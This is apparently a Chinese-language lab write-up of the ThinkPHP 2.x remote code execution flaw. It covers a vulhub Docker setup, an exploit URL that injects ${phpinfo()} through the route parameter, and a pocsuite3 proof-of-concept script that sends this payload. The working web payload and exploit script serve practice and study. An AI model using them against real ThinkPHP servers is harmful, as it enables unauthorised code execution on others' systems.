thinkphp 2.x 任意代码执行

thinkphp 2.x任意代码执行

1.漏洞概述

​ ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

​ 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

2.环境搭建

​ 在/vulhub/thinkphp/2-rce下执行docker-compose up -d

​ 环境启动后，访问http://192.168.1.142:8080/index.php查看默认页面

3.漏洞复现

直接访问http://192.168.1.142:8080/index.php?s=/index/index/name/${phpinfo()}即可执行phpinfo()

POC

from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD

class DemoPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'wcs'
    vulDate = '2022-04-16'
    createDate = '2022-04-16'
    updateDate = '2022-04-16'
    references = []
    name = 'thinkphp 2-rce 任意代码执行漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = '任意代码执行'
    desc = '''
        练习pocsuite    
    '''
    samples = []
    install_requires = []

    def _verify(self):
        output = Output(self)
        result = {}   # 验证代码
        payload = "/index.php?s=/index/index/name/${phpinfo()}"
        url = self.url
        try:
            resq = requests.get(url+payload)
            if resq and resq.status_code == 200 and "PHP Version" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
    def _attack(self):
        return self._verify()
register_poc(DemoPOC)

这个POC主要是自己练习使用pocsuite,就利用了现成的靶场，验证代码也比较简单